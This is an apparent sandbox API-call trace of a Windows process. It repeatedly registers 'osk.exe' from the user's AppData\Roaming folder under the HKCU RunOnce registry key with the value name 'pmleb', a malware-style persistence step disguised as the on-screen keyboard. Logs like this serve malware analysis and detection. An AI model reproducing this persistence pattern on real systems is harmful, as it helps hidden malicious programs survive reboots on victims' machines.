FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0092.250] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.250] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x76 [0092.250] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.251] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0092.251] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.251] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.251] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.251] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.251] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.251] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.252] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.252] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.252] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.252] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.252] RegCloseKey (hKey=0x280) returned 0x0 [0092.252] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.252] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.252] SetTimer (hWnd=0x20280, nIDEvent=0x21f1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f1 [0092.252] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.264] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.264] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.264] KillTimer (hWnd=0x20280, uIDEvent=0x21f1) returned 1 [0092.264] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.264] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.265] IUnknown:Release (This=0x787518) returned 0x1 [0092.265] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.265] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.265] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.265] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.266] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0092.266] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.266] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x77 [0092.266] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.267] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0092.267] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.267] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.267] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.267] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.267] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.267] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.267] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.267] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.268] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.268] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.268] RegCloseKey (hKey=0x280) returned 0x0 [0092.268] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.268] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.268] SetTimer (hWnd=0x20280, nIDEvent=0x21f2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f2 [0092.268] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.279] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.279] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.280] KillTimer (hWnd=0x20280, uIDEvent=0x21f2) returned 1 [0092.280] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.280] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.280] IUnknown:Release (This=0x787518) returned 0x1 [0092.280] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.280] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.280] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.281] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.281] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0092.281] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.281] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x78 [0092.281] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.282] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0092.282] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.282] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.282] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.282] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.282] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.283] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.283] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.283] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.283] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.283] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.283] RegCloseKey (hKey=0x280) returned 0x0 [0092.283] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.284] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.284] SetTimer (hWnd=0x20280, nIDEvent=0x21f3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f3 [0092.284] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.295] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.295] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.295] KillTimer (hWnd=0x20280, uIDEvent=0x21f3) returned 1 [0092.295] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.296] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.296] IUnknown:Release (This=0x787518) returned 0x1 [0092.296] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.296] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.296] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.296] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.296] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.296] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.296] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.296] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.296] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.297] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0092.297] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.297] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x79 [0092.297] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.298] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0092.298] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.298] 